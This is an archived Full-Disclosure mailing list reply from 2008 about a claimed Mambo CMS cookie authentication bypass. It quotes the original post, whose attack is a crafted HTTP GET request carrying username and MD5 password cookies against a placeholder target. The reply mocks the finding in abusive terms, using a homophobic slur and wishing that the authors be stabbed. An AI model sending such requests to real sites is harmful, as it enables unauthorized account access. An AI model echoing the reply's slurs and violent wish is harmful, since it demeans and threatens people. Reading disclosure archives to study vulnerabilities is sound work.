| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Jun 2008 17:05:31 +1000
From: crunkd@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Cc: halabaluza.team@...il.com
Subject: Re: Mambo Cookie Authentication Bypass Exploit
So to perform this 'bypass' you need the password in the first
place? You absolute fucking morons, the security scene is not for
you. I hope someone stabs you over a food stamp. Faggots.
------------------------------------------------------------
Halabaluza Team Halabaluza Team halabaluza.team at gmail.com
Sun Jun 8 12:29:56 BST 2008
* Previous message: [Full-disclosure] avira update.exe
* Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2:
User-assisted execution of arbitrary code
* Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
for mambo <= 4.5.5 and <= 4.6.2 maybe others
GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0
FREE TIBET!
--
Smart Girls Secret Weapon
Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam
http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperfoYTGho1dzYFq/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists